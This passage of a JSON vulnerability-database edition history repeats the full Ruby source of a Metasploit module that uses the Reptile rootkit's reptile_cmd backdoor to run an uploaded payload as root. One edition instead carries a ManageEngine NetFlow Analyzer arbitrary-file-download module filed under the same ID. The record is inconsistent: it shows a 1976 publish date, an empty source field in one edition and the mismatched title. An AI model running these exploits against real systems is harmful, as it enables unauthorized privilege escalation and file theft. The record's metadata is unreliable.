["PACKETSTORM:156620"]}, {"type": "thn", "idList": ["THN:03EECD650DB1FD1F15F27658CC11221F"]}, {"type": "threatpost", "idList": ["THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF"]}, {"type": "redhat", "idList": ["RHSA-2020:0669", "RHSA-2020:0666", "RHSA-2020:0664", "RHSA-2020:0661"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:DEC259D05B86EDA06F26D8E2A8DB3912"]}, {"type": "cve", "idList": ["CVE-2019-19792", "CVE-2020-4197"]}], "modified": "2020-03-05T05:57:20"}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-03-05T05:57:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-05T05:57:20", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-08T10:14:23", "history": [], "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestit", "idList": ["PENTESTIT:360357D741A17D2CDAE438A8E4EC3CDC"]}, {"type": "kitploit", "idList": ["KITPLOIT:2689429017237463050", "KITPLOIT:1936205943997647099", "KITPLOIT:4636513838701977240"]}, {"type": "cve", "idList": ["CVE-2020-9470", "CVE-2020-8634", "CVE-2020-8635", "CVE-2020-10193", "CVE-2020-9756"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7F37D852DA79CFCA493DFDA5C914E30F"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9EAF9F5D3A949E9D1958505C890AEFE4", "TALOSBLOG:2D764610DD2B1DFFA4DB9F2FA166DB1E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892135", "OPENVAS:1361412562310892134"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5560", "ELSA-2020-0708", "ELSA-2020-0703", "ELSA-2020-0704"]}, {"type": "zdt", "idList": ["1337DAY-ID-34053"]}], "modified": "2020-03-08T10:14:23"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-03-08T10:14:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-08T10:14:23", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-08T11:52:46", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "mskb", "idList": ["KB4532097", "KB4535706"]}, {"type": "pentestit", "idList": ["PENTESTIT:360357D741A17D2CDAE438A8E4EC3CDC"]}, {"type": "kitploit", "idList": ["KITPLOIT:2689429017237463050", "KITPLOIT:1936205943997647099", "KITPLOIT:4636513838701977240"]}, {"type": "cve", "idList": ["CVE-2020-9470", "CVE-2020-8634", "CVE-2020-8635", "CVE-2020-10193", "CVE-2020-9756"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7F37D852DA79CFCA493DFDA5C914E30F"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9EAF9F5D3A949E9D1958505C890AEFE4", "TALOSBLOG:2D764610DD2B1DFFA4DB9F2FA166DB1E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892135"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5560", "ELSA-2020-0704", "ELSA-2020-0703", "ELSA-2020-0708"]}], "modified": "2020-03-08T11:52:46"}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-03-08T11:52:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-08T11:52:46", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-09T19:53:08", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "thn", "idList": ["THN:ADC426CEBFBB238B6C2EC164CA047B16"]}, {"type": "threatpost", "idList": ["THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:898CE9F8A0DC0D8242DC17EADD40412D"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0324-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:59B91ED15A6BEF2D19953EDF76718DC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:8248445801063872062"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9EAF9F5D3A949E9D1958505C890AEFE4"]}, {"type": "avleonov", "idList": ["AVLEONOV:A9AB661A53F0E9B8923DE780E6F05F48"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5560"]}, {"type": "talos", "idList": ["TALOS-2019-0954", "TALOS-2019-0949", "TALOS-2019-0965", "TALOS-2019-0950"]}, {"type": "exploitdb", "idList": ["EDB-ID:48185", "EDB-ID:48181", "EDB-ID:48182", "EDB-ID:48183"]}, {"type": "zdt", "idList": ["1337DAY-ID-34065", "1337DAY-ID-34064"]}], "modified": "2020-03-09T19:53:08"}, "score": {"value": 1.9, "vector": "NONE", "modified": "2020-03-09T19:53:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-09T19:53:08", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-09T21:52:52", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1180686760582315875", "KITPLOIT:8248445801063872062"]}, {"type": "thn", "idList": ["THN:ADC426CEBFBB238B6C2EC164CA047B16"]}, {"type": "threatpost", "idList": ["THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:898CE9F8A0DC0D8242DC17EADD40412D"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0324-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:59B91ED15A6BEF2D19953EDF76718DC8"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9EAF9F5D3A949E9D1958505C890AEFE4"]}, {"type": "avleonov", "idList": ["AVLEONOV:A9AB661A53F0E9B8923DE780E6F05F48"]}, {"type": "zdt", "idList": ["1337DAY-ID-34065", "1337DAY-ID-34064"]}, {"type": "exploitdb", "idList": ["EDB-ID:48184", "EDB-ID:48185", "EDB-ID:48183", "EDB-ID:48182"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5560"]}, {"type": "talos", "idList": ["TALOS-2019-0954", "TALOS-2019-0965", "TALOS-2019-0949"]}], "modified": "2020-03-09T21:52:52"}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-03-09T21:52:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-09T21:52:52", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "68b02329effe6a8ac3ef59e063791730", "type": "metasploit", "bulletinFamily": "exploit", "title": "ManageEngine NetFlow Analyzer Arbitrary File Download", "description": "This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash.\n", "published": "2014-11-30T00:12:37", "modified": "2018-09-15T23:54:45", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5445", "https://seclists.org/fulldisclosure/2014/Dec/9", "https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt"], "cvelist": ["CVE-2014-5445"], "lastseen": "2020-03-14T19:49:58", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5445"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/NETFLOW_FILE_DOWNLOAD"]}, {"type": "zdi", "idList": ["ZDI-15-138"]}, {"type": "exploitdb", "idList": ["EDB-ID:43895"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31473", "SECURITYVULNS:VULN:14133"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129336"]}, {"type": "zdt", "idList": ["1337DAY-ID-22955", "1337DAY-ID-29645"]}, {"type": "nessus", "idList": ["MANAGEENGINE_NETFLOW_CVE-2014-5446.NASL"]}], "modified": "2020-03-14T19:49:58"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-03-14T19:49:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/netflow_file_download.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',\n 'Description' => %q{\n This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-5445' ],\n [ 'OSVDB', '115340' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],\n [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]\n ],\n 'DisclosureDate' => 'Nov 30 2014'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI',\n [ true, \"The base path to NetFlow Analyzer\", '/netflow' ]),\n OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\\\windows\\\\system.ini']),\n ])\n end\n\n\n def run\n # Create request\n begin\n print_status(\"Downloading file #{datastore['FILEPATH']}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),\n 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] },\n })\n rescue Rex::ConnectionError\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200\n if res.body.to_s.bytesize == 0\n print_error(\"0 bytes returned, file does not exist or it is empty.\")\n return\n end\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'netflow.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Failed to download file.\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-14T19:49:58", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-15T02:03:14", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1658909873428638412", "KITPLOIT:1116858433130862595"]}, {"type": "gentoo", "idList": ["GLSA-202003-13", "GLSA-202003-12"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:156729"]}, {"type": "cve", "idList": ["CVE-2019-18576", "CVE-2019-18577", "CVE-2019-13171", "CVE-2019-14299"]}, {"type": 